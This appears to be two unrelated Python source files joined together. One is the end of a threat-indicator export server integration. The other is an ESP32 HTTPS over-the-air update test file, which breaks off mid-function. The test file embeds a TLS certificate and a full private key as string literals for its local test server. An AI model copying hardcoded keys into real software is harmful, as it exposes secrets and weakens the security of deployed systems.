formatted_indicators.append(list_to_str(headers))
elif request_args.out_format == FORMAT_CSV and len(iocs) > 0:
formatted_indicators.append('indicator')
for ioc in iocs:
value = ioc.get('value')
type = ioc.get('indicator_type')
if value:
if request_args.out_format in [FORMAT_TEXT, FORMAT_CSV]:
if type == 'IP' and request_args.collapse_ips != DONT_COLLAPSE:
ipv4_formatted_indicators.append(IPAddress(value))
elif type == 'IPv6' and request_args.collapse_ips != DONT_COLLAPSE:
ipv6_formatted_indicators.append(IPAddress(value))
else:
formatted_indicators.append(value)
elif request_args.out_format == FORMAT_XSOAR_JSON_SEQ:
formatted_indicators.append(json.dumps(ioc))
elif request_args.out_format == FORMAT_JSON_SEQ:
json_format_indicator = json_format_single_indicator(ioc)
formatted_indicators.append(json.dumps(json_format_indicator))
elif request_args.out_format == FORMAT_XSOAR_CSV:
# wrap csv values with " to escape them
values = list(ioc.values())
formatted_indicators.append(list_to_str(values, map_func=lambda val: f'"{val}"'))
if len(ipv4_formatted_indicators) > 0:
ipv4_formatted_indicators = ips_to_ranges(ipv4_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv4_formatted_indicators)
if len(ipv6_formatted_indicators) > 0:
ipv6_formatted_indicators = ips_to_ranges(ipv6_formatted_indicators, request_args.collapse_ips)
formatted_indicators.extend(ipv6_formatted_indicators)
return {CTX_VALUES_KEY: list_to_str(formatted_indicators, '\n')}, len(formatted_indicators)
def get_outbound_mimetype() -> str:
"""Returns the mimetype of the export_iocs"""
ctx = get_integration_context().get('last_output', {})
return ctx.get(CTX_MIMETYPE_KEY, 'text/plain')
def get_outbound_ioc_values(on_demand, request_args: RequestArguments,
last_update_data=None, cache_refresh_rate=None) -> str:
"""
Get the ioc list to return in the list
"""
if last_update_data is None:
last_update_data = {}
last_update = last_update_data.get('last_run')
last_query = last_update_data.get('last_query')
current_iocs = last_update_data.get('current_iocs')
# on_demand ignores cache
if on_demand:
if request_args.is_request_change(last_update_data):
values_str = get_ioc_values_str_from_context(request_args=request_args, iocs=current_iocs)
else:
values_str = get_ioc_values_str_from_context(request_args=request_args)
else:
if last_update:
# takes the cache_refresh_rate amount of time back since run time.
cache_time, _ = parse_date_range(cache_refresh_rate, to_timestamp=True)
if last_update <= cache_time or request_args.is_request_change(last_update_data) or \
request_args.query != last_query:
values_str = refresh_outbound_context(request_args=request_args)
else:
values_str = get_ioc_values_str_from_context(request_args=request_args)
else:
values_str = refresh_outbound_context(request_args)
return values_str
def get_ioc_values_str_from_context(request_args: RequestArguments, iocs=None) -> str:
"""
Extracts output values from cache
"""
if iocs:
if request_args.offset > len(iocs):
return ''
iocs = iocs[request_args.offset: request_args.limit + request_args.offset]
returned_dict, _ = create_values_for_returned_dict(iocs, request_args=request_args)
current_cache = get_integration_context()
current_cache['last_output'] = returned_dict
set_integration_context(current_cache)
else:
returned_dict = get_integration_context().get('last_output', {})
return returned_dict.get(CTX_VALUES_KEY, '')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
"""
Tries to parse an integer, and if fails will throw DemistoException with given err_msg
"""
try:
res = int(int_to_parse)
except (TypeError, ValueError):
raise DemistoException(err_msg)
return res
def validate_basic_authentication(headers: dict, username: str, password: str) -> bool:
"""
Checks whether the authentication is valid.
:param headers: The headers of the http request
:param username: The integration's username
:param password: The integration's password
:return: Boolean which indicates whether the authentication is valid or not
"""
credentials: str = headers.get('Authorization', '')
if not credentials or 'Basic ' not in credentials:
return False
encoded_credentials: str = credentials.split('Basic ')[1]
credentials: str = b64decode(encoded_credentials).decode('utf-8')
if ':' not in credentials:
return False
credentials_list = credentials.split(':')
if len(credentials_list) != 2:
return False
user, pwd = credentials_list
return user == username and pwd == password
''' ROUTE FUNCTIONS '''
def get_request_args(params):
limit = try_parse_integer(request.args.get('n', params.get('list_size', 10000)), CTX_LIMIT_ERR_MSG)
offset = try_parse_integer(request.args.get('s', 0), CTX_OFFSET_ERR_MSG)
out_format = request.args.get('v', params.get('format', 'text'))
query = request.args.get('q', params.get('indicators_query'))
mwg_type = request.args.get('t', params.get('mwg_type', "string"))
strip_port = request.args.get('sp', params.get('strip_port', False))
drop_invalids = request.args.get('di', params.get('drop_invalids', False))
category_default = request.args.get('cd', params.get('category_default', 'bc_category'))
category_attribute = request.args.get('ca', params.get('category_attribute', ''))
collapse_ips = request.args.get('tr', params.get('collapse_ips', DONT_COLLAPSE))
csv_text = request.args.get('tx', params.get('csv_text', False))
sort_field = request.args.get('sf', params.get('sort_field'))
sort_order = request.args.get('so', params.get('sort_order'))
# handle flags
if strip_port is not None and strip_port == '':
strip_port = True
if drop_invalids is not None and drop_invalids == '':
drop_invalids = True
if csv_text is not None and csv_text == '':
csv_text = True
if collapse_ips is not None and collapse_ips not in [DONT_COLLAPSE, COLLAPSE_TO_CIDR, COLLAPSE_TO_RANGES]:
collapse_ips = try_parse_integer(collapse_ips, CTX_COLLAPSE_ERR_MSG)
if collapse_ips == 0:
collapse_ips = DONT_COLLAPSE
elif collapse_ips == 1:
collapse_ips = COLLAPSE_TO_RANGES
elif collapse_ips == 2:
collapse_ips = COLLAPSE_TO_CIDR
# prevent given empty params
if len(query) == 0:
query = params.get('indicators_query')
if len(out_format) == 0:
out_format = params.get('format', 'text')
if out_format not in [FORMAT_PROXYSG, FORMAT_PANOSURL, FORMAT_TEXT, FORMAT_JSON, FORMAT_CSV,
FORMAT_JSON_SEQ, FORMAT_MWG, FORMAT_ARG_BLUECOAT, FORMAT_ARG_MWG, FORMAT_ARG_PANOSURL,
FORMAT_ARG_PROXYSG, FORMAT_ARG_PANOSURL, FORMAT_XSOAR_JSON, FORMAT_ARG_XSOAR_JSON,
FORMAT_XSOAR_JSON_SEQ, FORAMT_ARG_XSOAR_JSON_SEQ, FORMAT_XSOAR_CSV, FORMAT_ARG_XSOAR_CSV]:
raise DemistoException(CTX_FORMAT_ERR_MSG)
elif out_format in [FORMAT_ARG_PROXYSG, FORMAT_ARG_BLUECOAT]:
out_format = FORMAT_PROXYSG
elif out_format == FORMAT_ARG_MWG:
out_format = FORMAT_MWG
elif out_format == FORMAT_ARG_PANOSURL:
out_format = FORMAT_PANOSURL
elif out_format == FORMAT_ARG_XSOAR_JSON:
out_format = FORMAT_XSOAR_JSON
elif out_format == FORAMT_ARG_XSOAR_JSON_SEQ:
out_format = FORMAT_XSOAR_JSON_SEQ
elif out_format == FORMAT_ARG_XSOAR_CSV:
out_format = FORMAT_XSOAR_CSV
if out_format == FORMAT_MWG:
if mwg_type not in MWG_TYPE_OPTIONS:
raise DemistoException(CTX_MWG_TYPE_ERR_MSG)
return RequestArguments(query, out_format, limit, offset, mwg_type, strip_port, drop_invalids, category_default,
category_attribute, collapse_ips, csv_text, sort_field, sort_order)
@APP.route('/', methods=['GET'])
def route_list_values() -> Response:
"""
Main handler for values saved in the integration context
"""
try:
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if username and password:
headers: dict = cast(Dict[Any, Any], request.headers)
if not validate_basic_authentication(headers, username, password):
err_msg: str = 'Basic authentication failed. Make sure you are using the right credentials.'
demisto.debug(err_msg)
return Response(err_msg, status=401)
request_args = get_request_args(params)
values = get_outbound_ioc_values(
on_demand=params.get('on_demand'),
last_update_data=get_integration_context(),
cache_refresh_rate=params.get('cache_refresh_rate'),
request_args=request_args
)
if not get_integration_context() and params.get('on_demand'):
values = 'You are running in On-Demand mode - please run !eis-update command to initialize the ' \
'export process'
elif not values:
values = "No Results Found For the Query"
mimetype = get_outbound_mimetype()
return Response(values, status=200, mimetype=mimetype)
except Exception:
return Response(traceback.format_exc(), status=400, mimetype='text/plain')
''' COMMAND FUNCTIONS '''
def test_module(args, params):
"""
Validates:
1. Valid port.
2. Valid cache_refresh_rate
"""
get_params_port(params)
on_demand = params.get('on_demand', None)
if not on_demand:
try_parse_integer(params.get('list_size'), CTX_LIMIT_ERR_MSG) # validate export_iocs Size was set
query = params.get('indicators_query') # validate indicators_query isn't empty
if not query:
raise ValueError('"Indicator Query" is required. Provide a valid query.')
cache_refresh_rate = params.get('cache_refresh_rate', '')
if not cache_refresh_rate:
raise ValueError(CTX_MISSING_REFRESH_ERR_MSG)
# validate cache_refresh_rate value
range_split = cache_refresh_rate.split(' ')
if len(range_split) != 2:
raise ValueError(CTX_MISSING_REFRESH_ERR_MSG)
try_parse_integer(range_split[0], 'Invalid time value for the Refresh Rate. Must be a valid integer.')
if not range_split[1] in ['minute', 'minutes', 'hour', 'hours', 'day', 'days', 'month', 'months', 'year',
'years']:
raise ValueError(
'Invalid time unit for the Refresh Rate. Must be minutes, hours, days, months, or years.')
parse_date_range(cache_refresh_rate, to_timestamp=True)
run_long_running(params, is_test=True)
return 'ok'
def run_long_running(params, is_test=False):
"""
Start the long running server
:param params: Demisto params
:param is_test: Indicates whether it's test-module run or regular run
:return: None
"""
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
certificate_path = str()
private_key_path = str()
try:
port = get_params_port(params)
ssl_args = dict()
if (certificate and not private_key) or (private_key and not certificate):
raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
context = SSLContext(PROTOCOL_TLSv1_2)
context.load_cert_chain(certificate_path, private_key_path)
ssl_args['ssl_context'] = context
demisto.debug('Starting HTTPS Server')
else:
demisto.debug('Starting HTTP Server')
server = WSGIServer(('', port), APP, **ssl_args, log=DEMISTO_LOGGER)
if is_test:
server_process = Process(target=server.serve_forever)
server_process.start()
time.sleep(5)
server_process.terminate()
else:
server.serve_forever()
except SSLError as e:
ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
demisto.error(ssl_err_message)
raise ValueError(ssl_err_message)
except Exception as e:
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
def update_outbound_command(args, params):
"""
Updates the export_iocs values and format on demand
"""
on_demand = params.get('on_demand')
if not on_demand:
raise DemistoException(
'"Update exported IOCs On Demand" is off. If you want to update manually please toggle it on.')
limit = try_parse_integer(args.get('list_size', params.get('list_size')), CTX_LIMIT_ERR_MSG)
print_indicators = args.get('print_indicators')
query = args.get('query')
# in case no query is entered take the query in the integration params
if not query:
query = params.get('indicators_query')
out_format = args.get('format')
offset = try_parse_integer(args.get('offset', 0), CTX_OFFSET_ERR_MSG)
mwg_type = args.get('mwg_type')
strip_port = args.get('strip_port') == 'True'
drop_invalids = args.get('drop_invalids') == 'True'
category_attribute = args.get('category_attribute')
category_default = args.get('category_default')
collapse_ips = args.get('collapse_ips')
csv_text = args.get('csv_text') == 'True'
sort_field = args.get('sort_field')
sort_order = args.get('sort_order')
request_args = RequestArguments(query, out_format, limit, offset, mwg_type, strip_port, drop_invalids,
category_default, category_attribute, collapse_ips, csv_text, sort_field, sort_order)
indicators = refresh_outbound_context(request_args)
if indicators:
hr = tableToMarkdown('List was updated successfully with the following values', indicators,
['Indicators']) if print_indicators == 'true' else 'List was updated successfully'
else:
hr = "No Results Found For the Query"
return CommandResults(readable_output=hr, raw_response=indicators)
def main():
"""
Main
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if (username and not password) or (password and not username):
err_msg: str = 'If using credentials, both username and password should be provided.'
demisto.debug(err_msg)
raise DemistoException(err_msg)
command = demisto.command()
demisto.debug('Command being called is {}'.format(command))
commands = {
'test-module': test_module,
'eis-update': update_outbound_command
}
try:
if command == 'long-running-execution':
run_long_running(params)
elif command in commands:
return_results(commands[command](demisto.args(), params))
else:
raise NotImplementedError(f'Command "{command}" is not implemented.')
except Exception as e:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{e}]'
return_error(err_msg)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print('Sending resp, URL: ' + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory('https://' + server_ip + ':' + str(redirection_port) + '/advanced_https_ota.bin')
httpd = http.server.HTTPServer((server_ip, server_port), redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('Image validation failed, image is corrupted', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('advanced_https_ota_example: esp_https_ota_read_img_desc failed', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
This is a positive test case, which starts a server and a redirection server.
Redirection server redirects http_request to different port
Number of iterations can be specified in variable iterations.
